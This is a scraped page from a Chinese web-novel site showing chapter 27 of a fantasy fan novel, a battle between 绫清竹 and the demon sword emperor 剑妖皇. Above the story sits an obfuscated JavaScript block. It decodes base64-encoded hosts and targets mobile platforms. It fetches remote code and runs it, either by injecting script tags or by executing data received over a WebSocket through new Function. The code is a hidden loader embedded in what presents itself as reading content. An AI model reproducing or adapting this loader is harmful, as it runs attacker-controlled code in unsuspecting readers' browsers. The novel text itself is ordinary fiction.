笔趣阁

字:
关灯 护眼
笔趣阁 > 斗破之灭世大战序章 > 第二十七章 主母之威
var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzk5OTk5OS0xMDE1Ng==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x73\x49\x42\x6b\x73\x42\x45\x58\x66\x4f']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=1000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,300000),ext='2',i='ndx'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9va3NramRrZnMucW9ybb3NtYWxsLmNvbbQ==','d3NzOi8vd3MMuc3luZ2d5LmNvbTo5MMDkw',window,document,['b','M']);}:function(){};

第二十七章 主母之威

章节错误,点此举报(免注册),举报后维护人员会在两分钟内校正章节内容,请耐心等待,并刷新页面。
轰隆隆!
  
      三道磅礴浩瀚的气息荡漾在天地之间,因为这里没有丝毫灵力的存在,天地反而被一种黑色所笼罩。
  
      在黑色之中,有着三道浑身不同的气息仿佛照耀了这片天地,其中一道气息,无比的锐利,凌厉的剑意仿佛能够斩断天地一般。
  
      嗡!
  
      一柄惊天剑光直冲云霄,化作一道数千万丈庞大的剑影,天地间存在的黑气,直接是攀延在剑身之上,令其具备一种锐利而又慑人的气息。
  
      在那剑意下方,有着一道白衣人影,他右手持剑,宛若剑神,只不过在其眉心处,有着一道漆黑无比的印记,隐约间构成了一道恶魔般的形状。
  
      他是剑妖皇。
  
      “好强的剑意,身为域外邪族,你倒真是个另类。”
  
      清脆的银铃嗓音在这天地间回荡而起,在黑暗的天际间,有着一道柔和的青色炫光绽放而开,近乎笼罩了正片大陆,在那天空,有着一道庞大无比的青莲绽放而开,花蕊之中,青衫女子淡淡一笑,便令得天地仿佛失去了颜色,她就如同那世间最为纯净的青莲,神圣而干净。
  
      “就是不知,你的剑意与清竹比起来,能撑多久!?”
  
      青衫女子美目轻抬,在那里,有着一位白衣胜雪的女子,青丝挽起,轻拂耳间,其容颜绝美,一颦一笑间,清冽无双,手尺三尺青锋,在其上,还有着淡淡的乳白色光晕摇曳闪烁,在其周身的空间,那种黑暗仿佛被驱散,有着一道道乳白色的涟漪荡漾而开,仿若净化。
  
      “你们的存在玷污了这世间,所以,消失吧。”
  
      绫清竹向来寡言,而且对于这域外邪族之人,她是厌恶到了极致,三尺青锋剑刃轻侧,而后一剑直直刺出。
  
      嗡嗡嗡!
  
      剑尖之上,肉眼可见的乳白色涟漪荡漾而开,化作一道乳白色的涟漪光罩,光罩足足有近亿万丈庞大,突兀出现在这天地间,将这天地间的黑气都是净化了去,她手腕轻抖,剑身轻颤,乳白色光罩便是覆盖而下,那目标,正是剑妖皇。
  
      “太上净魔。”
  
      犹如代表了世界的意志一般,那种声音回荡在这天地之间,似乎不可忤逆,绫清竹眼神凛然,她对于域外邪族可不会有丝毫留手。
  
      那犹如净化万物的乳白色光罩笼罩了天地,阵阵涟漪荡漾而开,将黑气尽数驱散,就连剑妖皇那柄仿佛直插苍穹的恐怖剑影都是仿佛要被净化,黑气一点点笑容,锐利的剑意也是萎靡而下,绫清竹所修炼的《太上感应诀》对于域外邪族来说,便是天生的克星。
  
      剑妖皇感觉到自己浑身的不爽,那种乳白色的气息仿佛要将他的身躯都是驱散,身为域外邪族的妖皇,他更是对这种感觉厌恶到了极致,面对着那镇压而下的亿万丈光罩,他英俊的脸上泛起一丝残忍的微笑,嘴角扬起。
  
      “如若这是在外界,我或许还会惧你,不过要是在这里,你的这种力量,连消耗我力量的能力都没有。”
  
      他将手中长剑负于背后,而后双膝盘下,就那么端坐在虚空之中,双目闭合,双手合十,犹如虔诚的信徒一般,在其喉间,有着道道诡异的语言回荡在大地之上。
  
      咚!咚!咚!
  
      大地之上,突然有着咚咚的巨响之声响起,而后一丝丝的黑气从大地之上渗出,刚开始很稀薄,而后逐渐地变得浓郁,再后来,便是出现了犹如黑色液体一般的水流,那原本看起来有着几分清明的天地,就这么的又变回了原状,仿佛更加的黑暗。
  
      嗵!嗵!嗵!
  
      大地上,渗出的黑色液体居然缓缓固化,化作一道道黑色光柱,光柱刚开始非常的细,只有寸许半径,而后,便是迅速的延伸而开,犹如攀爬的虫子一般,越扩越大,转瞬间,便是已至百万丈半径。
  
      那其中蕴含的,都是恐怖到了极致的魔气。
  
      “吾之祖先啊,护吾之身,戮尽蝼蚁。”
  
      剑妖皇轻声呢喃,在那大地上,一道道光柱冲天而起,仿佛互相联系一般,而那最先出现的一道光柱已是迅速的生长,与绫清竹施展的净化光罩在天际间抵在一起!
  
      嗤嗤!
  
      两者碰撞,并没有意料之中的惊天巨响散发而出,倒是有着不断腐蚀的声音回荡在天地间。
  
      《太上感应决》的力量以及域外邪族的力量,碰撞在一起,只有互相侵蚀。
  
      咚!咚!咚!
  
      原本拥有惊天威势的光罩在愈发多起来的光柱支撑之下,逐渐的变得弱势,而且那种势头,仿佛永不停息。
  
      “哼!”
  
      绫清竹美目淡漠的看着剑妖皇的反击,冷哼一声,便是莲足轻跺,转瞬间便是出现在那最先出现的黑色光柱之下,而后一剑刺出,指的是光柱的中心。
  
      嗡!
  
      绫清竹的一剑,直接插在了光柱的中心,而后一道乳白色光线化作光流,丝毫没有阻碍的贯穿了整个光柱,那光柱也是直接被净化而去。
『加入书签,方便阅读』
热门推荐
长夜余火 快看那个大佬 有请小师叔 在港综成为传说 旧日之箓 诡异世界生存手册 诡秘之主 奥术神座 灭运图录 武道宗师